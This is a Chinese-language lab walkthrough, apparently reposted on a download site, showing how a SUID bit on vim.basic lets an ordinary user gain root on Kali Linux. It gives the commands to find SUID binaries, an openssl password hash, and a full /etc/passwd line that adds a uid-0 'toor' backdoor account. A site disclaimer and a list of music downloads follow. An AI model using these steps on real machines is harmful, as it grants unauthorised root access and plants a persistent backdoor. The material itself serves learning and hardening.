在kali上复现
先给需要的vim.basic文件设置suid权限
chmod u+s /usr/bin/vim.basic
先adduser test1一个普通权限用户
现在就是一个合适的提权环境
通过以下命令可以找到存在suid权限的文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
可用于提权的文件有
- nmap
- vim
- find
- bash
- more
- less
- nano
- cp
利用vim提权的思路是修改etc/passwd文件,为自己添加一个有root权限的用户
passwd文件用户格式为:用户名:密码:uid:gid:注释:home目录:用户的shell
这边可以看看root用户的格式
root:x:0:0:root:/root:/bin/bash
(密码这部分之所以是x,是因为真正的密码存在/etc/shadow文件里)
生成密码:用openssl passwd -1 –salt asd 123 (这里是-1(数字1)不是L)
直接写在passwd文件里面,
toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash
用vim /etc/passwd可以修改,但是在保存是会出现E212,无法保存,提示我们没有权限修改这个
这时应该用之前find找到的vim.basic文件运行,这个程序是有suid权限的。绝对可以修改
vim.basic /etc/passwd
用这个打开,然后修改文件,就可以成功保存
可以看到已经添加了,su toor切换,密码123,再id查看一下权限
root权限
chmod u+s /usr/bin/vim.basic
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持。
免责声明:本站资源来自互联网收集,仅供用于学习和交流,请遵循相关法律法规,本站一切资源不代表本站立场,如有侵权、后门、不妥请联系本站删除!
更新日志
- ZWEI《迟暮的花 (Explicit)》[FLAC/分轨][137.51MB]
- 八戒《Gimme Gimme Love》[320K/MP3][39.21MB]
- 宝丽金群星1991《宝丽金超白金精选特辑Ⅱ》2CD[WAV+CUE][1.1G]
- 姚斯婷《但愿人长久》头版限量编号24K金碟[低速原抓WAV+CUE][1G]
- 孙露《试机孙露AMCD》WAV+CUE
- 张雨生《GreatestHits-XRCD2+HMCD》[WAV+CUE]
- FIM-无可挑剔的声音(SuperSound声霸1)[FLAC+CUE]
- 萧亚轩《3面夏娃/三面夏娃》[WAV+CUE][1G]
- 佛音《大悲咒》新加坡金碟珍藏版[WAV+CUE][994M]
- 刘德丽《赤的疑惑HQCD》头版限量编号MQA[WAV+CUE][1G]
- 谢采妘《古典情·现代心精选辑》[南方唱片]2CD[WAV整轨]
- [好时代珍藏系列]山口百惠《赤之传说》[WAV+CUE]
- RonaldBrautigam,PeterMasseursandConcertgebouwOrchestraAmsterdam-ShostakovichTheJazz
- 筷子兄弟《老男孩》[WAV+CUE][899M]
- 陈曦《寂寞在唱歌HQCD》2023头版限量编号[WAV+CUE][1G]